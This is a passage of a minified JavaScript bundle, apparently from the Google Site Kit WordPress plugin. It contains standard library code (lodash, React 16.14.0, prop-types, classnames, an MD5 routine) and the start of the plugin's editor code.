Fr(t,e)},Bn.reduce=function(t,e,n){var r=Wu(t)?ze:Ke,o=arguments.length<3;return r(t,ri(e,4),n,o,ur)},Bn.reduceRight=function(t,e,n){var r=Wu(t)?Me:Ke,o=arguments.length<3;return r(t,ri(e,4),n,o,ar)},Bn.repeat=function(t,e,n){return e=(n?gi(t,e,n):e===r)?1:ca(e),$r(pa(t),e)},Bn.replace=function(){var t=arguments,e=pa(t[0]);return t.length<3?e:e.replace(t[1],t[2])},Bn.result=function(t,e,n){var o=-1,i=(e=ho(e,t)).length;for(i||(i=1,t=r);++o<i;){var u=null==t?r:t[Ri(e[o])];u===r&&(o=i,u=n),t=qu(u)?u.call(t):u}return t},Bn.round=dc,Bn.runInContext=t,Bn.sample=function(t){return(Wu(t)?qn:qr)(t)},Bn.size=function(t){if(null==t)return 0;if(Uu(t))return ea(t)?hn(t):t.length;var e=fi(t);return e==x||e==O?t.size:Cr(t).length},Bn.snakeCase=Ba,Bn.some=function(t,e,n){var o=Wu(t)?We:Xr;return n&&gi(t,e,n)&&(e=r),o(t,ri(e,3))},Bn.sortedIndex=function(t,e){return Qr(t,e)},Bn.sortedIndexBy=function(t,e,n){return to(t,e,ri(n,2))},Bn.sortedIndexOf=function(t,e){var n=null==t?0:t.length;if(n){var r=Qr(t,e);if(r<n&&Iu(t[r],e))return r}return-1},Bn.sortedLastIndex=function(t,e){return Qr(t,e,!0)},Bn.sortedLastIndexBy=function(t,e,n){return to(t,e,ri(n,2),!0)},Bn.sortedLastIndexOf=function(t,e){if(null==t?0:t.length){var n=Qr(t,e,!0)-1;if(Iu(t[n],e))return n}return-1},Bn.startCase=Fa,Bn.startsWith=function(t,e,n){return t=pa(t),n=null==n?0:er(ca(n),0,t.length),e=ro(e),t.slice(n,n+e.length)==e},Bn.subtract=yc,Bn.sum=function(t){return t&&t.length?Ze(t,Ja):0},Bn.sumBy=function(t,e){return t&&t.length?Ze(t,ri(e,2)):0},Bn.template=function(t,e,n){var o=Bn.templateSettings;n&&gi(t,e,n)&&(e=r),t=pa(t),e=_a({},e,o,Vo);var i,u,a=_a({},e.imports,o.imports,Vo),c=Aa(a),f=Qe(a,c),l=0,s=e.interpolate||wt,p="__p += '",h=Lt((e.escape||wt).source+"|"+s.source+"|"+(s===Q?ht:wt).source+"|"+(e.evaluate||wt).source+"|$","g"),g="//# sourceURL="+(zt.call(e,"sourceURL")?(e.sourceURL+"").replace(/\s/g," "):"lodash.templateSources["+ ++ue+"]")+"\n";t.replace(h,function(e,n,r,o,a,c){return r||(r=o),p+=t.slice(l,c).replace(kt,un),n&&(i=!0,p+="' +\n__e("+n+") +\n'"),a&&(u=!0,p+="';\n"+a+";\n__p += '"),r&&(p+="' +\n((__t = ("+r+")) == null ? '' : __t) +\n'"),l=c+e.length,e}),p+="';\n";var _=zt.call(e,"variable")&&e.variable;if(_){if(st.test(_))throw new xt("Invalid `variable` option passed into `_.template`")}else p="with (obj) {\n"+p+"\n}\n";p=(u?p.replace(H,""):p).replace(q,"$1").replace(G,"$1;"),p="function("+(_||"obj")+") {\n"+(_?"":"obj || (obj = {});\n")+"var __t, __p = ''"+(i?", __e = _.escape":"")+(u?", __j = Array.prototype.join;\nfunction print() { __p += __j.call(arguments, '') }\n":";\n")+p+"return __p\n}";var v=Ga(function(){return At(c,g+"return "+p).apply(r,f)});if(v.source=p,Hu(v))throw v;return v},Bn.times=function(t,e){if((t=ca(t))<1||t>h)return[];var n=_,r=bn(t,_);e=ri(e),t-=_;for(var o=Ye(r,e);++n<t;)e(n);return o},Bn.toFinite=aa,Bn.toInteger=ca,Bn.toLength=fa,Bn.toLower=function(t){return pa(t).toLowerCase()},Bn.toNumber=la,Bn.toSafeInteger=function(t){return t?er(ca(t),-9007199254740991,h):0===t?t:0},Bn.toString=pa,Bn.toUpper=function(t){return pa(t).toUpperCase()},Bn.trim=function(t,e,n){if((t=pa(t))&&(n||e===r))return Je(t);if(!t||!(e=ro(e)))return t;var o=gn(t),i=gn(e);return _o(o,en(o,i),nn(o,i)+1).join("")},Bn.trimEnd=function(t,e,n){if((t=pa(t))&&(n||e===r))return t.slice(0,_n(t)+1);if(!t||!(e=ro(e)))return t;var o=gn(t);return _o(o,0,nn(o,gn(e))+1).join("")},Bn.trimStart=function(t,e,n){if((t=pa(t))&&(n||e===r))return t.replace(it,"");if(!t||!(e=ro(e)))return t;var o=gn(t);return _o(o,en(o,gn(e))).join("")},Bn.truncate=function(t,e){var n=30,o="...";if(Ku(e)){var i="separator"in e?e.separator:i;n="length"in e?ca(e.length):n,o="omission"in e?ro(e.omission):o}var u=(t=pa(t)).length;if(an(t)){var a=gn(t);u=a.length}if(n>=u)return t;var c=n-hn(o);if(c<1)return o;var f=a?_o(a,0,c).join(""):t.slice(0,c);if(i===r)return f+o;if(a&&(c+=f.length-c),Qu(i)){if(t.slice(c).search(i)){var l,s=f;for(i.global||(i=Lt(i.source,pa(gt.exec(i))+"g")),i.lastIndex=0;l=i.exec(s);)var p=l.index;f=f.slice(0,p===r?c:p)}}else if(t.indexOf(ro(i),c)!=c){var h=f.lastIndexOf(i);h>-1&&(f=f.slice(0,h))}return f+o},Bn.unescape=function(t){return(t=pa(t))&&Z.test(t)?t.replace(V,vn):t},Bn.uniqueId=function(t){var e=++Mt;return pa(t)+e},Bn.upperCase=$a,Bn.upperFirst=Ha,Bn.each=pu,Bn.eachRight=hu,Bn.first=Ui,ec(Bn,(_c={},gr(Bn,function(t,e){zt.call(Bn.prototype,e)||(_c[e]=t)}),_c),{chain:!1}),Bn.VERSION="4.17.21",Le(["bind","bindKey","curry","curryRight","partial","partialRight"],function(t){Bn[t].placeholder=Bn}),Le(["drop","take"],function(t,e){LazyWrapper.prototype[t]=function(n){n=n===r?1:mn(ca(n),0);var o=this.__filtered__&&!e?new LazyWrapper(this):this.clone();return o.__filtered__?o.__takeCount__=bn(n,o.__takeCount__):o.__views__.push({size:bn(n,_),type:t+(o.__dir__<0?"Right":"")}),o},LazyWrapper.prototype[t+"Right"]=function(e){return this.reverse()[t](e).reverse()}}),Le(["filter","map","takeWhile"],function(t,e){var n=e+1,r=1==n||3==n;LazyWrapper.prototype[t]=function(t){var e=this.clone();return e.__iteratees__.push({iteratee:ri(t,3),type:n}),e.__filtered__=e.__filtered__||r,e}}),Le(["head","last"],function(t,e){var n="take"+(e?"Right":"");LazyWrapper.prototype[t]=function(){return this[n](1).value()[0]}}),Le(["initial","tail"],function(t,e){var n="drop"+(e?"":"Right");LazyWrapper.prototype[t]=function(){return this.__filtered__?new LazyWrapper(this):this[n](1)}}),LazyWrapper.prototype.compact=function(){return this.filter(Ja)},LazyWrapper.prototype.find=function(t){return this.filter(t).head()},LazyWrapper.prototype.findLast=function(t){return this.reverse().find(t)},LazyWrapper.prototype.invokeMap=Hr(function(t,e){return"function"==typeof t?new LazyWrapper(this):this.map(function(n){return xr(n,t,e)})}),LazyWrapper.prototype.reject=function(t){return this.filter(Ou(ri(t)))},LazyWrapper.prototype.slice=function(t,e){t=ca(t);var n=this;return n.__filtered__&&(t>0||e<0)?new LazyWrapper(n):(t<0?n=n.takeRight(-t):t&&(n=n.drop(t)),e!==r&&(n=(e=ca(e))<0?n.dropRight(-e):n.take(e-t)),n)},LazyWrapper.prototype.takeRightWhile=function(t){return this.reverse().takeWhile(t).reverse()},LazyWrapper.prototype.toArray=function(){return this.take(_)},gr(LazyWrapper.prototype,function(t,e){var n=/^(?:filter|find|map|reject)|While$/.test(e),o=/^(?:head|last)$/.test(e),i=Bn[o?"take"+("last"==e?"Right":""):e],u=o||/^find/.test(e);i&&(Bn.prototype[e]=function(){var e=this.__wrapped__,a=o?[1]:arguments,c=e instanceof LazyWrapper,f=a[0],l=c||Wu(e),s=function(t){var e=i.apply(Bn,De([t],a));return o&&p?e[0]:e};l&&n&&"function"==typeof f&&1!=f.length&&(c=l=!1);var p=this.__chain__,h=!!this.__actions__.length,g=u&&!p,_=c&&!h;if(!u&&l){e=_?e:new LazyWrapper(this);var v=t.apply(e,a);return v.__actions__.push({func:au,args:[s],thisArg:r}),new LodashWrapper(v,p)}return g&&_?t.apply(this,a):(v=this.thru(s),g?o?v.value()[0]:v.value():v)})}),Le(["pop","push","shift","sort","splice","unshift"],function(t){var e=Rt[t],n=/^(?:push|sort|unshift)$/.test(t)?"tap":"thru",r=/^(?:pop|shift)$/.test(t);Bn.prototype[t]=function(){var t=arguments;if(r&&!this.__chain__){var o=this.value();return e.apply(Wu(o)?o:[],t)}return this[n](function(n){return e.apply(Wu(n)?n:[],t)})}}),gr(LazyWrapper.prototype,function(t,e){var n=Bn[e];if(n){var r=n.name+"";zt.call(jn,r)||(jn[r]=[]),jn[r].push({name:e,func:n})}}),jn[Do(r,2).name]=[{name:"wrapper",func:r}],LazyWrapper.prototype.clone=function(){var t=new LazyWrapper(this.__wrapped__);return t.__actions__=xo(this.__actions__),t.__dir__=this.__dir__,t.__filtered__=this.__filtered__,t.__iteratees__=xo(this.__iteratees__),t.__takeCount__=this.__takeCount__,t.__views__=xo(this.__views__),t},LazyWrapper.prototype.reverse=function(){if(this.__filtered__){var t=new LazyWrapper(this);t.__dir__=-1,t.__filtered__=!0}else(t=this.clone()).__dir__*=-1;return t},LazyWrapper.prototype.value=function(){var t=this.__wrapped__.value(),e=this.__dir__,n=Wu(t),r=e<0,o=n?t.length:0,i=function(t,e,n){var r=-1,o=n.length;for(;++r<o;){var i=n[r],u=i.size;switch(i.type){case"drop":t+=u;break;case"dropRight":e-=u;break;case"take":e=bn(e,t+u);break;case"takeRight":t=mn(t,e-u)}}return{start:t,end:e}}(0,o,this.__views__),u=i.start,a=i.end,c=a-u,f=r?a:u-1,l=this.__iteratees__,s=l.length,p=0,h=bn(c,this.__takeCount__);if(!n||!r&&o==c&&h==c)return co(t,this.__actions__);var g=[];t:for(;c--&&p<h;){for(var _=-1,v=t[f+=e];++_<s;){var d=l[_],y=d.iteratee,m=d.type,b=y(v);if(2==m)v=b;else if(!b){if(1==m)continue t;break t}}g[p++]=v}return g},Bn.prototype.at=cu,Bn.prototype.chain=function(){return uu(this)},Bn.prototype.commit=function(){return new LodashWrapper(this.value(),this.__chain__)},Bn.prototype.next=function(){this.__values__===r&&(this.__values__=ua(this.value()));var t=this.__index__>=this.__values__.length;return{done:t,value:t?r:this.__values__[this.__index__++]}},Bn.prototype.plant=function(t){for(var e,n=this;n instanceof $n;){var o=Ni(n);o.__index__=0,o.__values__=r,e?i.__wrapped__=o:e=o;var i=o;n=n.__wrapped__}return i.__wrapped__=t,e},Bn.prototype.reverse=function(){var t=this.__wrapped__;if(t instanceof LazyWrapper){var e=t;return this.__actions__.length&&(e=new LazyWrapper(this)),(e=e.reverse()).__actions__.push({func:au,args:[Ki],thisArg:r}),new LodashWrapper(e,this.__chain__)}return this.thru(Ki)},Bn.prototype.toJSON=Bn.prototype.valueOf=Bn.prototype.value=function(){return co(this.__wrapped__,this.__actions__)},Bn.prototype.first=Bn.prototype.head,Xt&&(Bn.prototype[Xt]=function(){return this}),Bn}();"function"==typeof define&&"object"==typeof define.amd&&define.amd?(ge._=dn,define(function(){return dn})):ve?((ve.exports=dn)._=dn,_e._=dn):ge._=dn}.call(this)},362:(t,e,n)=>{"use strict";var r=n(441);function o(){}function i(){}i.resetWarningCache=o,t.exports=function(){function t(t,e,n,o,i,u){if(u!==r){var a=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw a.name="Invariant Violation",a}}function e(){return t}t.isRequired=t;var n={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:o};return n.PropTypes=n,n}},403:(t,e,n)=>{"use strict";var r=n(664),o="function"==typeof Symbol&&Symbol.for,i=o?Symbol.for("react.element"):60103,u=o?Symbol.for("react.portal"):60106,a=o?Symbol.for("react.fragment"):60107,c=o?Symbol.for("react.strict_mode"):60108,f=o?Symbol.for("react.profiler"):60114,l=o?Symbol.for("react.provider"):60109,s=o?Symbol.for("react.context"):60110,p=o?Symbol.for("react.forward_ref"):60112,h=o?Symbol.for("react.suspense"):60113,g=o?Symbol.for("react.memo"):60115,_=o?Symbol.for("react.lazy"):60116,v="function"==typeof Symbol&&Symbol.iterator;function d(t){for(var e="https://reactjs.org/docs/error-decoder.html?invariant="+t,n=1;n<arguments.length;n++)e+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+t+"; visit "+e+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var y={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},m={};function b(t,e,n){this.props=t,this.context=e,this.refs=m,this.updater=n||y}function w(){}function k(t,e,n){this.props=t,this.context=e,this.refs=m,this.updater=n||y}b.prototype.isReactComponent={},b.prototype.setState=function(t,e){if("object"!=typeof t&&"function"!=typeof t&&null!=t)throw Error(d(85));this.updater.enqueueSetState(this,t,e,"setState")},b.prototype.forceUpdate=function(t){this.updater.enqueueForceUpdate(this,t,"forceUpdate")},w.prototype=b.prototype;var S=k.prototype=new w;S.constructor=k,r(S,b.prototype),S.isPureReactComponent=!0;var x={current:null},A=Object.prototype.hasOwnProperty,E={key:!0,ref:!0,__self:!0,__source:!0};function T(t,e,n){var r,o={},u=null,a=null;if(null!=e)for(r in void 0!==e.ref&&(a=e.ref),void 0!==e.key&&(u=""+e.key),e)A.call(e,r)&&!E.hasOwnProperty(r)&&(o[r]=e[r]);var c=arguments.length-2;if(1===c)o.children=n;else if(1<c){for(var f=Array(c),l=0;l<c;l++)f[l]=arguments[l+2];o.children=f}if(t&&t.defaultProps)for(r in c=t.defaultProps)void 0===o[r]&&(o[r]=c[r]);return{$$typeof:i,type:t,key:u,ref:a,props:o,_owner:x.current}}function L(t){return"object"==typeof t&&null!==t&&t.$$typeof===i}var O=/\/+/g,C=[];function R(t,e,n,r){if(C.length){var o=C.pop();return o.result=t,o.keyPrefix=e,o.func=n,o.context=r,o.count=0,o}return{result:t,keyPrefix:e,func:n,context:r,count:0}}function j(t){t.result=null,t.keyPrefix=null,t.func=null,t.context=null,t.count=0,10>C.length&&C.push(t)}function N(t,e,n,r){var o=typeof t;"undefined"!==o&&"boolean"!==o||(t=null);var a=!1;if(null===t)a=!0;else switch(o){case"string":case"number":a=!0;break;case"object":switch(t.$$typeof){case i:case u:a=!0}}if(a)return n(r,t,""===e?"."+D(t,0):e),1;if(a=0,e=""===e?".":e+":",Array.isArray(t))for(var c=0;c<t.length;c++){var f=e+D(o=t[c],c);a+=N(o,f,n,r)}else if(null===t||"object"!=typeof t?f=null:f="function"==typeof(f=v&&t[v]||t["@@iterator"])?f:null,"function"==typeof f)for(t=f.call(t),c=0;!(o=t.next()).done;)a+=N(o=o.value,f=e+D(o,c++),n,r);else if("object"===o)throw n=""+t,Error(d(31,"[object Object]"===n?"object with keys {"+Object.keys(t).join(", ")+"}":n,""));return a}function I(t,e,n){return null==t?0:N(t,"",e,n)}function D(t,e){return"object"==typeof t&&null!==t&&null!=t.key?function(t){var e={"=":"=0",":":"=2"};return"$"+(""+t).replace(/[=:]/g,function(t){return e[t]})}(t.key):e.toString(36)}function z(t,e){t.func.call(t.context,e,t.count++)}function M(t,e,n){var r=t.result,o=t.keyPrefix;t=t.func.call(t.context,e,t.count++),Array.isArray(t)?W(t,r,n,function(t){return t}):null!=t&&(L(t)&&(t=function(t,e){return{$$typeof:i,type:t.type,key:e,ref:t.ref,props:t.props,_owner:t._owner}}(t,o+(!t.key||e&&e.key===t.key?"":(""+t.key).replace(O,"$&/")+"/")+n)),r.push(t))}function W(t,e,n,r,o){var i="";null!=n&&(i=(""+n).replace(O,"$&/")+"/"),I(t,M,e=R(e,i,r,o)),j(e)}var P={current:null};function U(){var t=P.current;if(null===t)throw Error(d(321));return t}var B={ReactCurrentDispatcher:P,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:x,IsSomeRendererActing:{current:!1},assign:r};e.Children={map:function(t,e,n){if(null==t)return t;var r=[];return W(t,r,null,e,n),r},forEach:function(t,e,n){if(null==t)return t;I(t,z,e=R(null,null,e,n)),j(e)},count:function(t){return I(t,function(){return null},null)},toArray:function(t){var e=[];return W(t,e,null,function(t){return t}),e},only:function(t){if(!L(t))throw Error(d(143));return t}},e.Component=b,e.Fragment=a,e.Profiler=f,e.PureComponent=k,e.StrictMode=c,e.Suspense=h,e.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=B,e.cloneElement=function(t,e,n){if(null==t)throw Error(d(267,t));var o=r({},t.props),u=t.key,a=t.ref,c=t._owner;if(null!=e){if(void 0!==e.ref&&(a=e.ref,c=x.current),void 0!==e.key&&(u=""+e.key),t.type&&t.type.defaultProps)var f=t.type.defaultProps;for(l in e)A.call(e,l)&&!E.hasOwnProperty(l)&&(o[l]=void 0===e[l]&&void 0!==f?f[l]:e[l])}var l=arguments.length-2;if(1===l)o.children=n;else if(1<l){f=Array(l);for(var s=0;s<l;s++)f[s]=arguments[s+2];o.children=f}return{$$typeof:i,type:t.type,key:u,ref:a,props:o,_owner:c}},e.createContext=function(t,e){return void 0===e&&(e=null),(t={$$typeof:s,_calculateChangedBits:e,_currentValue:t,_currentValue2:t,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:l,_context:t},t.Consumer=t},e.createElement=T,e.createFactory=function(t){var e=T.bind(null,t);return e.type=t,e},e.createRef=function(){return{current:null}},e.forwardRef=function(t){return{$$typeof:p,render:t}},e.isValidElement=L,e.lazy=function(t){return{$$typeof:_,_ctor:t,_status:-1,_result:null}},e.memo=function(t,e){return{$$typeof:g,type:t,compare:void 0===e?null:e}},e.useCallback=function(t,e){return U().useCallback(t,e)},e.useContext=function(t,e){return U().useContext(t,e)},e.useDebugValue=function(){},e.useEffect=function(t,e){return U().useEffect(t,e)},e.useImperativeHandle=function(t,e,n){return U().useImperativeHandle(t,e,n)},e.useLayoutEffect=function(t,e){return U().useLayoutEffect(t,e)},e.useMemo=function(t,e){return U().useMemo(t,e)},e.useReducer=function(t,e,n){return U().useReducer(t,e,n)},e.useRef=function(t){return U().useRef(t)},e.useState=function(t){return U().useState(t)},e.version="16.14.0"},441:t=>{"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},452:t=>{!function(){"use strict";var e={}.hasOwnProperty;function n(){for(var t="",e=0;e<arguments.length;e++){var n=arguments[e];n&&(t=o(t,r(n)))}return t}function r(t){if("string"==typeof t||"number"==typeof t)return t;if("object"!=typeof t)return"";if(Array.isArray(t))return n.apply(null,t);if(t.toString!==Object.prototype.toString&&!t.toString.toString().includes("[native code]"))return t.toString();var r="";for(var i in t)e.call(t,i)&&t[i]&&(r=o(r,i));return r}function o(t,e){return e?t?t+" "+e:t+e:t}t.exports?(n.default=n,t.exports=n):"function"==typeof define&&"object"==typeof define.amd&&define.amd?define("classnames",[],function(){return n}):window.classNames=n}()},523:(t,e,n)=>{!function(){var e=n(919),r=n(987).utf8,o=n(634),i=n(987).bin,u=function(t,n){t.constructor==String?t=n&&"binary"===n.encoding?i.stringToBytes(t):r.stringToBytes(t):o(t)?t=Array.prototype.slice.call(t,0):Array.isArray(t)||t.constructor===Uint8Array||(t=t.toString());for(var a=e.bytesToWords(t),c=8*t.length,f=1732584193,l=-271733879,s=-1732584194,p=271733878,h=0;h<a.length;h++)a[h]=16711935&(a[h]<<8|a[h]>>>24)|4278255360&(a[h]<<24|a[h]>>>8);a[c>>>5]|=128<<c%32,a[14+(c+64>>>9<<4)]=c;var g=u._ff,_=u._gg,v=u._hh,d=u._ii;for(h=0;h<a.length;h+=16){var y=f,m=l,b=s,w=p;f=g(f,l,s,p,a[h+0],7,-680876936),p=g(p,f,l,s,a[h+1],12,-389564586),s=g(s,p,f,l,a[h+2],17,606105819),l=g(l,s,p,f,a[h+3],22,-1044525330),f=g(f,l,s,p,a[h+4],7,-176418897),p=g(p,f,l,s,a[h+5],12,1200080426),s=g(s,p,f,l,a[h+6],17,-1473231341),l=g(l,s,p,f,a[h+7],22,-45705983),f=g(f,l,s,p,a[h+8],7,1770035416),p=g(p,f,l,s,a[h+9],12,-1958414417),s=g(s,p,f,l,a[h+10],17,-42063),l=g(l,s,p,f,a[h+11],22,-1990404162),f=g(f,l,s,p,a[h+12],7,1804603682),p=g(p,f,l,s,a[h+13],12,-40341101),s=g(s,p,f,l,a[h+14],17,-1502002290),f=_(f,l=g(l,s,p,f,a[h+15],22,1236535329),s,p,a[h+1],5,-165796510),p=_(p,f,l,s,a[h+6],9,-1069501632),s=_(s,p,f,l,a[h+11],14,643717713),l=_(l,s,p,f,a[h+0],20,-373897302),f=_(f,l,s,p,a[h+5],5,-701558691),p=_(p,f,l,s,a[h+10],9,38016083),s=_(s,p,f,l,a[h+15],14,-660478335),l=_(l,s,p,f,a[h+4],20,-405537848),f=_(f,l,s,p,a[h+9],5,568446438),p=_(p,f,l,s,a[h+14],9,-1019803690),s=_(s,p,f,l,a[h+3],14,-187363961),l=_(l,s,p,f,a[h+8],20,1163531501),f=_(f,l,s,p,a[h+13],5,-1444681467),p=_(p,f,l,s,a[h+2],9,-51403784),s=_(s,p,f,l,a[h+7],14,1735328473),f=v(f,l=_(l,s,p,f,a[h+12],20,-1926607734),s,p,a[h+5],4,-378558),p=v(p,f,l,s,a[h+8],11,-2022574463),s=v(s,p,f,l,a[h+11],16,1839030562),l=v(l,s,p,f,a[h+14],23,-35309556),f=v(f,l,s,p,a[h+1],4,-1530992060),p=v(p,f,l,s,a[h+4],11,1272893353),s=v(s,p,f,l,a[h+7],16,-155497632),l=v(l,s,p,f,a[h+10],23,-1094730640),f=v(f,l,s,p,a[h+13],4,681279174),p=v(p,f,l,s,a[h+0],11,-358537222),s=v(s,p,f,l,a[h+3],16,-722521979),l=v(l,s,p,f,a[h+6],23,76029189),f=v(f,l,s,p,a[h+9],4,-640364487),p=v(p,f,l,s,a[h+12],11,-421815835),s=v(s,p,f,l,a[h+15],16,530742520),f=d(f,l=v(l,s,p,f,a[h+2],23,-995338651),s,p,a[h+0],6,-198630844),p=d(p,f,l,s,a[h+7],10,1126891415),s=d(s,p,f,l,a[h+14],15,-1416354905),l=d(l,s,p,f,a[h+5],21,-57434055),f=d(f,l,s,p,a[h+12],6,1700485571),p=d(p,f,l,s,a[h+3],10,-1894986606),s=d(s,p,f,l,a[h+10],15,-1051523),l=d(l,s,p,f,a[h+1],21,-2054922799),f=d(f,l,s,p,a[h+8],6,1873313359),p=d(p,f,l,s,a[h+15],10,-30611744),s=d(s,p,f,l,a[h+6],15,-1560198380),l=d(l,s,p,f,a[h+13],21,1309151649),f=d(f,l,s,p,a[h+4],6,-145523070),p=d(p,f,l,s,a[h+11],10,-1120210379),s=d(s,p,f,l,a[h+2],15,718787259),l=d(l,s,p,f,a[h+9],21,-343485551),f=f+y>>>0,l=l+m>>>0,s=s+b>>>0,p=p+w>>>0}return e.endian([f,l,s,p])};u._ff=function(t,e,n,r,o,i,u){var a=t+(e&n|~e&r)+(o>>>0)+u;return(a<<i|a>>>32-i)+e},u._gg=function(t,e,n,r,o,i,u){var a=t+(e&r|n&~r)+(o>>>0)+u;return(a<<i|a>>>32-i)+e},u._hh=function(t,e,n,r,o,i,u){var a=t+(e^n^r)+(o>>>0)+u;return(a<<i|a>>>32-i)+e},u._ii=function(t,e,n,r,o,i,u){var a=t+(n^(e|~r))+(o>>>0)+u;return(a<<i|a>>>32-i)+e},u._blocksize=16,u._digestsize=16,t.exports=function(t,n){if(null==t)throw new Error("Illegal argument "+t);var r=e.wordsToBytes(u(t,n));return n&&n.asBytes?r:n&&n.asString?i.bytesToString(r):e.bytesToHex(r)}}()},532:t=>{t.exports=function(t,e){var n,r,o=0;function i(){var i,u,a=n,c=arguments.length;t:for(;a;){if(a.args.length===arguments.length){for(u=0;u<c;u++)if(a.args[u]!==arguments[u]){a=a.next;continue t}return a!==n&&(a===r&&(r=a.prev),a.prev.next=a.next,a.next&&(a.next.prev=a.prev),a.next=n,a.prev=null,n.prev=a,n=a),a.val}a=a.next}for(i=new Array(c),u=0;u<c;u++)i[u]=arguments[u];return a={args:i,val:t.apply(null,i)},n?(n.prev=a,a.next=n):r=a,o===e.maxSize?(r=r.prev).next=null:o++,n=a,a.val}return e=e||{},i.clear=function(){n=null,r=null,o=0},i}},540:(t,e,n)=>{"use strict";t.exports=n(192)},634:t=>{function e(t){return!!t.constructor&&"function"==typeof t.constructor.isBuffer&&t.constructor.isBuffer(t)}t.exports=function(t){return null!=t&&(e(t)||function(t){return"function"==typeof t.readFloatLE&&"function"==typeof t.slice&&e(t.slice(0,0))}(t)||!!t._isBuffer)}},664:t=>{"use strict";var e=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;t.exports=function(){try{if(!Object.assign)return!1;var t=new String("abc");if(t[5]="de","5"===Object.getOwnPropertyNames(t)[0])return!1;for(var e={},n=0;n<10;n++)e["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(e).map(function(t){return e[t]}).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach(function(t){r[t]=t}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},r)).join("")}catch(t){return!1}}()?Object.assign:function(t,o){for(var i,u,a=function(t){if(null==t)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(t)}(t),c=1;c<arguments.length;c++){for(var f in i=Object(arguments[c]))n.call(i,f)&&(a[f]=i[f]);if(e){u=e(i);for(var l=0;l<u.length;l++)r.call(i,u[l])&&(a[u[l]]=i[u[l]])}}return a}},688:(t,e,n)=>{t.exports=n(362)()},696:(t,e,n)=>{"use strict";t.exports=n(403)},919:t=>{var e,n;e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",n={rotl:function(t,e){return t<<e|t>>>32-e},rotr:function(t,e){return t<<32-e|t>>>e},endian:function(t){if(t.constructor==Number)return 16711935&n.rotl(t,8)|4278255360&n.rotl(t,24);for(var e=0;e<t.length;e++)t[e]=n.endian(t[e]);return t},randomBytes:function(t){for(var e=[];t>0;t--)e.push(Math.floor(256*Math.random()));return e},bytesToWords:function(t){for(var e=[],n=0,r=0;n<t.length;n++,r+=8)e[r>>>5]|=t[n]<<24-r%32;return e},wordsToBytes:function(t){for(var e=[],n=0;n<32*t.length;n+=8)e.push(t[n>>>5]>>>24-n%32&255);return e},bytesToHex:function(t){for(var e=[],n=0;n<t.length;n++)e.push((t[n]>>>4).toString(16)),e.push((15&t[n]).toString(16));return e.join("")},hexToBytes:function(t){for(var e=[],n=0;n<t.length;n+=2)e.push(parseInt(t.substr(n,2),16));return e},bytesToBase64:function(t){for(var n=[],r=0;r<t.length;r+=3)for(var o=t[r]<<16|t[r+1]<<8|t[r+2],i=0;i<4;i++)8*r+6*i<=8*t.length?n.push(e.charAt(o>>>6*(3-i)&63)):n.push("=");return n.join("")},base64ToBytes:function(t){t=t.replace(/[^A-Z0-9+\/]/gi,"");for(var n=[],r=0,o=0;r<t.length;o=++r%4)0!=o&&n.push((e.indexOf(t.charAt(r-1))&Math.pow(2,-2*o+8)-1)<<2*o|e.indexOf(t.charAt(r))>>>6-2*o);return n}},t.exports=n},987:t=>{var e={utf8:{stringToBytes:function(t){return e.bin.stringToBytes(unescape(encodeURIComponent(t)))},bytesToString:function(t){return decodeURIComponent(escape(e.bin.bytesToString(t)))}},bin:{stringToBytes:function(t){for(var e=[],n=0;n<t.length;n++)e.push(255&t.charCodeAt(n));return e},bytesToString:function(t){for(var e=[],n=0;n<t.length;n++)e.push(String.fromCharCode(t[n]));return e.join("")}}};t.exports=e}},e={};function __webpack_require__(n){var r=e[n];if(void 0!==r)return r.exports;var o=e[n]={id:n,loaded:!1,exports:{}};return t[n].call(o.exports,o,o.exports,__webpack_require__),o.loaded=!0,o.exports}__webpack_require__.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return __webpack_require__.d(e,{a:e}),e},__webpack_require__.d=(t,e)=>{for(var n in e)__webpack_require__.o(e,n)&&!__webpack_require__.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:e[n]})},__webpack_require__.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(t){if("object"==typeof window)return window}}(),__webpack_require__.o=(t,e)=>Object.prototype.hasOwnProperty.call(t,e),__webpack_require__.nmd=t=>(t.paths=[],t.children||(t.children=[]),t),(()=>{"use strict";const t=wp.plugins,e=googlesitekit.data;var n=__webpack_require__.n(e);const r="core/modules",o="kmAnalyticsTopCategories",i="core/editor",u="modules/reader-revenue-manager",a=googlesitekit.i18n,c=((0,a.__)("Specific content types","google-site-kit"),(0,a.__)("Specified pages","google-site-kit"),(0,a.__)("Site wide","google-site-kit"),"reader-revenue-manager"),f=wp.editPost,l=wp.editor;var s,p=__webpack_require__(696);function h(){return h=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)({}).hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t},h.apply(null,arguments)}const g=t=>p.createElement("svg",h({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},t),s||(s=p.createElement("g",{fill:"none",fillRule:"evenodd"},p.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 